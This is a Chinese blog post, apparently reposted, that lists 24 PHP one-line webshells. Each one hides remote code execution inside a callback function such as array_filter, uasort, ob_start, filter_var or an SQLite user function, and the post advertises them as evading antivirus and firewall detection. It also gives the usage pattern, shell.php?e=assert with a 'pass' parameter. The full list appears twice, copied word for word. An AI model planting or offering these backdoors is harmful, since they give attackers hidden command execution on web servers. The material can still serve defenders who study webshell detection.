一些无特征PHP一句话
2015-07-26 09:37
531 查看
不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)
原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
所有一句话使用方法基本都是: http:// target/shell.php?e=assert 密码pass
01
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, $e);
02
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map($e, $arr);
03
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, $e);
04
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);
05
$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');
06
$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));
$arr->uksort('assert');
07
$e = $_REQUEST['e'];
$arr = array(1);
array_reduce($arr, $e, $_POST['pass']);
08
$e = $_REQUEST['e'];
$arr = array($_POST['pass']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);
09
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk($arr, $e, '');
10
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
11
mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');
12
echo preg_filter('|.*|e', $_REQUEST['pass'], '');
13
ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();
14
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
15
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function($e, $_REQUEST['pass']);
16
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
17
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
18
$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));
19
$e = $_REQUEST['e'];
$db = new SQLite3('sqlite.db3');
$db->createFunction('myfunc', $e);
$stmt = $db->prepare("SELECT myfunc(?)");
$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);
$stmt->execute();
20
$str = urlencode($_REQUEST['pass']);
$yaml = <<<EOD
greeting: !{$str} "|.+|e"
EOD;
$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));
21
$mem = new Memcache();
$re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));
$mem->connect($_REQUEST['pass'], 11211, 0);
22
preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);
23
mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);
24
$iterator = new CallbackFilterIterator(new ArrayIterator(array($_REQUEST['pass'],)), create_function('$a', 'assert($a);'));
foreach ($iterator as $item) {echo $item;}
原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
所有一句话使用方法基本都是: http:// target/shell.php?e=assert 密码pass
01
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, $e);
02
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map($e, $arr);
03
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, $e);
04
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);
05
$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');
06
$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));
$arr->uksort('assert');
07
$e = $_REQUEST['e'];
$arr = array(1);
array_reduce($arr, $e, $_POST['pass']);
08
$e = $_REQUEST['e'];
$arr = array($_POST['pass']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);
09
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk($arr, $e, '');
10
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
11
mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');
12
echo preg_filter('|.*|e', $_REQUEST['pass'], '');
13
ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();
14
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
15
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function($e, $_REQUEST['pass']);
16
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
17
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
18
$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));
19
$e = $_REQUEST['e'];
$db = new SQLite3('sqlite.db3');
$db->createFunction('myfunc', $e);
$stmt = $db->prepare("SELECT myfunc(?)");
$stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);
$stmt->execute();
20
$str = urlencode($_REQUEST['pass']);
$yaml = <<<EOD
greeting: !{$str} "|.+|e"
EOD;
$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));
21
$mem = new Memcache();
$re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));
$mem->connect($_REQUEST['pass'], 11211, 0);
22
preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);
23
mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);
24
$iterator = new CallbackFilterIterator(new ArrayIterator(array($_REQUEST['pass'],)), create_function('$a', 'assert($a);'));
foreach ($iterator as $item) {echo $item;}
相关文章推荐
- (二)PHP面向对象理论2---魔术方法、继承、多态
- ftp文件夹错误:windows无法访问此文件夹,请确保输入的文件名是否正确,并且您有权访问此文件
- PHP数据类型转换(字符转数字,数字转字符)
- 初学者之php基础(一)
- PHP实现简单数字分页效果
- PHP中COOKIES使用示例
- php检测文本的编码
- php实现将Session写入数据库
- PHP位运算
- 关于 Laravel 的维护模式
- ThinkPHP 3.2.x多个模块使用公共Layout布局文件
- PHP常用代码笔记
- PHP - MVC
- SMTP 协议系列一
- PHP-source-xmlEncode-1
- laravel实用笔记
- 内网php项目访问(切换在线解决)
- 内网php项目访问(切换在线解决)
- vim ctags vimgrep
- [PHP] 文件上传过程中基于白名单、黑名单、基于MIME的认证以及目录认证